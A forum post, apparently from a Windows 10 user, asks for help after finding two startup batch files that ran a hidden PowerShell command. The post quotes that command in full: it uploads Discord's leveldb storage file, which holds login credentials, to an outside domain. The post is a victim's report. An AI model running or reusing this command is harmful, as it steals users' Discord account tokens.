Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing:
powershell -windowstyle hidden -Command "& {&invoke-webrequest -method put -infile 'C:\Users\foo\AppData\Roaming\Discord\Local Storage\leveldb\000005.ldb' https://rip.rblx.dev/c/}"
The source of these commands are two batch files in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp - LVTUSIX.bat and LVTUSIXd.bat. Both files were created this morning while I was away from my computer (about 30 min after turning it on). I'm unaware of a way to see who/what created the files - they are owned by the administrators group.
I can't find anything online about rip.rblx.dev or these batch files. A whois lookup on the domain reveals that all the info is privacy-protected.
I'm very suspicious as some research reveals that these .ldb files contain Discord user credentials.
Is anyone aware of what might be going on? Alternatively, does anyone have advice on how I might be able to find more info? I've since temporarily mangled the files to prevent them from running until I learn more. Thank you in advance.